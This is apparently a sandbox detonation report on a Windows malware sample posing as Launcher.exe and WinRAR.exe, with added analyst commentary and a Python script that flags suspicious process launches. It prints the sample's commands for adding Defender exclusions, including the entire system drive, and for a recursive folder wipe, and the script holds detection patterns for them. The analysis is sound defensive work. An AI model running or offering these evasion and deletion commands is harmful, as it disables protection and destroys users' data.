Analysis: behavioral26
Detonation Overview
Submitted
2024-02-29 02:14
Reported
2024-02-29 03:23
Platform
win10v2004-20240226-en
Max time kernel
1527s
Max time network
1515s
Command Line
Signatures
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-2727153400-192325109-1870347593-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\data\Launcher.exe | N/A |
Enumerates physical storage devices
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D69B561148F01C77C54578C10926DF5B856976AD | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\data\Launcher.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D69B561148F01C77C54578C10926DF5B856976AD\Blob = [binary blob omitted] | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\data\Launcher.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D69B561148F01C77C54578C10926DF5B856976AD\Blob = [binary blob omitted] | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\data\Launcher.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 4388 wrote to memory of 1264 | N/A | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\data\Launcher.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
| PID 4388 wrote to memory of 1264 | N/A | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\data\Launcher.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
| PID 4388 wrote to memory of 1264 | N/A | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\data\Launcher.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
| PID 4388 wrote to memory of 1144 | N/A | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\data\Launcher.exe | C:\Windows\SysWOW64\cmd.exe |
| PID 4388 wrote to memory of 1144 | N/A | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\data\Launcher.exe | C:\Windows\SysWOW64\cmd.exe |
| PID 4388 wrote to memory of 1144 | N/A | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\data\Launcher.exe | C:\Windows\SysWOW64\cmd.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\data\Launcher.exe
"C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\data\Launcher.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath $env:ProgramData, $env:AppData, $env:SystemDrive\ "
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /K rd /s /q "C:\Users\Admin\AppData\Roaming\services" & EXIT
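Three command lines in this Processes list carry the whole story of the behavioral25 and behavioral26 runs. Launcher.exe, running from %TEMP%, spawns PowerShell with -ExecutionPolicy Bypass to add Defender exclusions for $env:ProgramData, $env:AppData and $env:SystemDrive\ (the last one covers the entire system drive, which effectively switches real-time scanning off for everything the sample will touch), and then spawns cmd.exe to wipe a directory under %APPDATA%. The logged image path is SysWOW64 while the command line names System32: that is WoW64 file-system redirection, because Launcher.exe runs as a 32-bit process and asked for the System32 binary, not a tampered command line.

The Python below is an added example and not part of the sandbox output. It scores process-creation records of the kind Sysmon event 1 or EDR telemetry provide (parent image, image, command line) against exactly these behaviours, plus the rundll32 ordinal load and the -File launches from %TEMP% seen in the other runs on this page. The sample records are constructed from this page's command lines with one benign baseline added for contrast; the top-level parent (explorer.exe), the rule names and the threshold for a "broad" exclusion (an environment-variable root, a drive root or one directory below it) are this example's own choices.

```python
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    parent: str    # parent image path
    image: str     # image path as the OS resolved it
    cmdline: str   # command line as logged


# Locations an unprivileged user can write to; code launched from here gets scrutiny.
USER_WRITABLE = re.compile(r"\\(?:AppData\\(?:Local|Roaming)|Temp|Users\\Public|ProgramData)\\", re.I)
EXCLUSION_ARG = re.compile(r"-ExclusionPath\s+([^\"']+?)\s*(?:[\"']|$)", re.I)
DESTRUCTIVE_CMD = re.compile(r"\b(?:rd|rmdir)\s+/s\s+/q\b|\bdel\s+/[fq]", re.I)
RUNDLL_ORDINAL = re.compile(r"rundll32(?:\.exe)?\s+(\S+\.dll),#?\d+", re.I)
PS_BYPASS = re.compile(r"-e\w*\s+bypass", re.I)   # -ep, -ex, -ExecutionPolicy bypass
PS_FILE = re.compile(r"-file\s+(\S+)", re.I)


def exclusion_paths(cmdline: str) -> list[str]:
    """Paths handed to Add-MpPreference -ExclusionPath, or [] if the command has none."""
    m = EXCLUSION_ARG.search(cmdline)
    if not m:
        return []
    return [p.strip().strip("'\"") for p in m.group(1).split(",") if p.strip()]


def is_broad(path: str) -> bool:
    """True when an exclusion covers a whole well-known root instead of one app directory."""
    p = path.rstrip("\\")
    if p.lower().startswith("$env:"):
        return "\\" not in p          # $env:AppData, $env:ProgramData, $env:SystemDrive ...
    parts = [c for c in p.split("\\") if c]
    return len(parts) <= 2            # a drive root or one directory below it (C:\, C:\ProgramData)


def evaluate(ev: ProcEvent) -> list[str]:
    """Rule names that fire for one process-creation record (empty list = nothing notable)."""
    findings = []
    exe = ev.image.lower().rsplit("\\", 1)[-1]
    cl = ev.cmdline
    if exe == "powershell.exe":
        broad = [p for p in exclusion_paths(cl) if is_broad(p)]
        if broad:
            findings.append("defender_exclusion_broad:" + ";".join(broad))
        script = PS_FILE.search(cl)
        if PS_BYPASS.search(cl) and (USER_WRITABLE.search(ev.parent)
                                     or (script and USER_WRITABLE.search(script.group(1)))):
            findings.append("ps_bypass_from_userdir")
    elif exe == "cmd.exe":
        if DESTRUCTIVE_CMD.search(cl) and USER_WRITABLE.search(ev.parent):
            findings.append("self_delete_cmd")
    elif exe == "rundll32.exe":
        m = RUNDLL_ORDINAL.search(cl)
        if m and USER_WRITABLE.search(m.group(1)):
            findings.append("rundll32_userdir_ordinal")
    # Informational: a 32-bit parent asked for \System32\ and WoW64 redirected it to
    # \SysWOW64\. This explains the path mismatch in the report; it is not tampering.
    if "\\syswow64\\" in ev.image.lower() and "\\system32\\" in cl.lower():
        findings.append("wow64_redirected")
    return findings


def triage(events: list[ProcEvent]) -> list[list[str]]:
    return [evaluate(ev) for ev in events]


# Constructed sample: command lines copied from this report; parent/child pairs follow the
# WriteProcessMemory rows (Launcher.exe -> powershell.exe, cmd.exe); explorer.exe as the
# top-level parent is assumed. The last record is a benign baseline made up here to check
# that the rules stay quiet for a narrow exclusion added without -ExecutionPolicy Bypass.
LAUNCHER = r"C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\data\Launcher.exe"
SAMPLE_EVENTS = [
    ProcEvent(r"C:\Windows\explorer.exe", LAUNCHER, f'"{LAUNCHER}"'),
    ProcEvent(LAUNCHER, r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
              r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass '
              r'-Command "Add-MpPreference -ExclusionPath $env:ProgramData, $env:AppData, $env:SystemDrive\ "'),
    ProcEvent(LAUNCHER, r"C:\Windows\SysWOW64\cmd.exe",
              r'"C:\Windows\System32\cmd.exe" /K rd /s /q "C:\Users\Admin\AppData\Roaming\services" & EXIT'),
    ProcEvent(r"C:\Windows\explorer.exe", r"C:\Windows\system32\rundll32.exe",
              r"rundll32.exe C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\data\Launcher.dll,#1"),
    ProcEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\data\AppInfo\VO1DaL46eflm.ps1"),
    ProcEvent(r"C:\Windows\System32\cmd.exe", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r'powershell.exe -Command "Add-MpPreference -ExclusionPath C:\Build\cache"'),
]

if __name__ == "__main__":
    for ev, found in zip(SAMPLE_EVENTS, triage(SAMPLE_EVENTS)):
        name = ev.image.rsplit("\\", 1)[-1]
        print(f"{name:16} {', '.join(found) or 'clean'}")
```

Running the file prints one line per record; the exclusion command line is the record to act on, since it fires on the exclusion rule, the bypass-from-user-directory rule and the informational WoW64 note at once. The __PSScriptPolicyTest_*.ps1 entries under Files (same hash in behavioral14 and behavioral26) are written by PowerShell itself at startup to probe AppLocker/WDAC policy and are not a dropped payload.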
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 76.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.154.82.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 23.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 194.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 55.36.223.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 41.110.16.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 157.123.68.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 206.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.134.221.88.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 201.64.52.20.in-addr.arpa | udp |
| NL | 52.142.223.178:80 | | tcp |
| US | 8.8.8.8:53 | 79.121.231.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 43.58.199.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.35.223.20.in-addr.arpa | udp |
Files
memory/1264-0-0x0000000002B00000-0x0000000002B36000-memory.dmp
memory/1264-1-0x0000000072B20000-0x00000000732D0000-memory.dmp
memory/1264-3-0x00000000056E0000-0x0000000005D08000-memory.dmp
memory/1264-4-0x0000000002AF0000-0x0000000002B00000-memory.dmp
memory/1264-2-0x0000000002AF0000-0x0000000002B00000-memory.dmp
memory/1264-5-0x0000000005660000-0x0000000005682000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ud2qsq20.gwy.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/1264-11-0x0000000005D80000-0x0000000005DE6000-memory.dmp
memory/1264-12-0x0000000005DF0000-0x0000000005E56000-memory.dmp
memory/1264-17-0x0000000005F60000-0x00000000062B4000-memory.dmp
memory/1264-18-0x0000000006430000-0x000000000644E000-memory.dmp
memory/1264-19-0x0000000006470000-0x00000000064BC000-memory.dmp
memory/1264-20-0x0000000002AF0000-0x0000000002B00000-memory.dmp
memory/1264-21-0x00000000075F0000-0x0000000007622000-memory.dmp
memory/1264-22-0x000000006F460000-0x000000006F4AC000-memory.dmp
memory/1264-32-0x00000000069F0000-0x0000000006A0E000-memory.dmp
memory/1264-33-0x0000000007630000-0x00000000076D3000-memory.dmp
memory/1264-34-0x0000000007DA0000-0x000000000841A000-memory.dmp
memory/1264-35-0x0000000007750000-0x000000000776A000-memory.dmp
memory/1264-36-0x00000000077D0000-0x00000000077DA000-memory.dmp
memory/1264-37-0x0000000007A10000-0x0000000007AA6000-memory.dmp
memory/1264-38-0x0000000007940000-0x0000000007951000-memory.dmp
memory/1264-39-0x0000000007980000-0x000000000798E000-memory.dmp
memory/1264-40-0x0000000007990000-0x00000000079A4000-memory.dmp
memory/1264-41-0x00000000079D0000-0x00000000079EA000-memory.dmp
memory/1264-42-0x00000000079C0000-0x00000000079C8000-memory.dmp
memory/1264-45-0x0000000072B20000-0x00000000732D0000-memory.dmp
Analysis: behavioral7
Detonation Overview
Submitted
2024-02-29 02:14
Reported
2024-02-29 02:53
Platform
win7-20240221-en
Max time kernel
1795s
Max time network
1820s
Command Line
Signatures
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\data\AppInfo\VO1DaL46eflm.ps1
Network
Files
memory/2396-4-0x000000001B2A0000-0x000000001B582000-memory.dmp
memory/2396-6-0x0000000002460000-0x0000000002468000-memory.dmp
memory/2396-5-0x000007FEF5B90000-0x000007FEF652D000-memory.dmp
memory/2396-7-0x0000000002B50000-0x0000000002BD0000-memory.dmp
memory/2396-8-0x000007FEF5B90000-0x000007FEF652D000-memory.dmp
memory/2396-9-0x0000000002B50000-0x0000000002BD0000-memory.dmp
memory/2396-10-0x0000000002B50000-0x0000000002BD0000-memory.dmp
memory/2396-11-0x0000000002B50000-0x0000000002BD0000-memory.dmp
memory/2396-12-0x0000000002B50000-0x0000000002BD0000-memory.dmp
memory/2396-13-0x000007FEF5B90000-0x000007FEF652D000-memory.dmp
Analysis: behavioral14
Detonation Overview
Submitted
2024-02-29 02:14
Reported
2024-02-29 02:53
Platform
win10v2004-20240226-en
Max time kernel
1792s
Max time network
1850s
Command Line
Signatures
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\data\AppInfo\YwTGpGD7UtG1.ps1
C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x32c 0x4b4
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 68.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 9.228.82.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 194.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 58.99.105.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 183.59.114.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.187.3.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 41.110.16.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.154.82.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.134.221.88.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 21.236.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 180.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 24.73.42.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.35.223.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 57.169.31.20.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_h1tjdkzw.1sj.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/3772-9-0x000001A1A9A30000-0x000001A1A9A52000-memory.dmp
memory/3772-10-0x00007FFEEDF80000-0x00007FFEEEA41000-memory.dmp
memory/3772-11-0x000001A1C20C0000-0x000001A1C20D0000-memory.dmp
memory/3772-12-0x000001A1C20C0000-0x000001A1C20D0000-memory.dmp
memory/3772-13-0x000001A1C20C0000-0x000001A1C20D0000-memory.dmp
memory/3772-16-0x00007FFEEDF80000-0x00007FFEEEA41000-memory.dmp
Analysis: behavioral21
Detonation Overview
Submitted
2024-02-29 02:14
Reported
2024-02-29 02:56
Platform
win7-20240220-en
Max time kernel
1563s
Max time network
1570s
Command Line
Signatures
Modifies system executable filetype association
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shellex\PropertySheetHandlers\{B41DB860-8EE4-11D2-9906-E49FADC173CA} | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shellex\PropertySheetHandlers\{B41DB860-8EE4-11D2-9906-E49FADC173CA}\ | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\shellex\ContextMenuHandlers\WinRAR32 | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\shellex\ContextMenuHandlers\WinRAR32\ = "{B41DB860-8EE4-11D2-9906-E49FADC173CA}" | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shellex\PropertySheetHandlers\{B41DB860-64E4-11D2-9906-E49FADC173CA} | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shellex\PropertySheetHandlers\{B41DB860-64E4-11D2-9906-E49FADC173CA}\ | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\shellex\ContextMenuHandlers\WinRAR | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\shellex\ContextMenuHandlers\WinRAR\ = "{B41DB860-64E4-11D2-9906-E49FADC173CA}" | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
Enumerates physical storage devices
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\Main | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR.REV\ = "RAR recovery volume" | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR.ZIP\shellex\ContextMenuHandlers | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Drive\shellex\DragDropHandlers\WinRAR32 | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Drive\shellex\DragDropHandlers\WinRAR | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR\shellex\DropHandler\ = "{B41DB860-64E4-11D2-9906-E49FADC173CA}" | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR\shellex\PropertySheetHandlers\{B41DB860-64E4-11D2-9906-E49FADC173CA} | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR.ZIP\shellex\DropHandler\ = "{B41DB860-64E4-11D2-9906-E49FADC173CA}" | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR.ZIP\shell\open\command | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR.REV\DefaultIcon | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR\shellex\PropertySheetHandlers | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shellex\PropertySheetHandlers\{B41DB860-8EE4-11D2-9906-E49FADC173CA}\ | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR\shellex\ContextMenuHandlers\{B41DB860-64E4-11D2-9906-E49FADC173CA}\ | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Folder\shellex\ContextMenuHandlers\WinRAR32 | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR\ = "WinRAR archive" | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR.ZIP\shell\open | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR.ZIP\DefaultIcon | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR.ZIP\DefaultIcon\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\data\\AppInfo\\services\\WinRAR.exe,0" | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR.REV\shell\open\command | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR.REV\DefaultIcon\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\data\\AppInfo\\services\\WinRAR.exe,1" | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\WinRAR32 | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Folder\ShellEx\DragDropHandlers\WinRAR32\ = "{B41DB860-8EE4-11D2-9906-E49FADC173CA}" | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\WinRAR32\ = "{B41DB860-8EE4-11D2-9906-E49FADC173CA}" | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Folder\ShellEx\DragDropHandlers\WinRAR\ = "{B41DB860-64E4-11D2-9906-E49FADC173CA}" | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR.REV\shell\open\command\ = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\data\\AppInfo\\services\\WinRAR.exe\" \"%1\"" | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\shellex\ContextMenuHandlers\WinRAR32 | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR.ZIP\shellex\PropertySheetHandlers\{B41DB860-64E4-11D2-9906-E49FADC173CA}\ | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Folder\ShellEx\ContextMenuHandlers\WinRAR\ = "{B41DB860-64E4-11D2-9906-E49FADC173CA}" | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR\shellex | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR.ZIP\shellex\ContextMenuHandlers\{B41DB860-8EE4-11D2-9906-E49FADC173CA}\ | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR.ZIP\shellex\DropHandler | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\shellex\ContextMenuHandlers\WinRAR | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.rev | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR.REV\shell | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR.ZIP | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR\shellex\DropHandler | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Drive\shellex\DragDropHandlers\WinRAR\ = "{B41DB860-64E4-11D2-9906-E49FADC173CA}" | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shellex\PropertySheetHandlers\{B41DB860-64E4-11D2-9906-E49FADC173CA} | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shellex\PropertySheetHandlers\{B41DB860-64E4-11D2-9906-E49FADC173CA}\ | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR\shell | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR\shell\open\command\ = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\data\\AppInfo\\services\\WinRAR.exe\" \"%1\"" | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR.ZIP\ = "WinRAR ZIP archive" | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
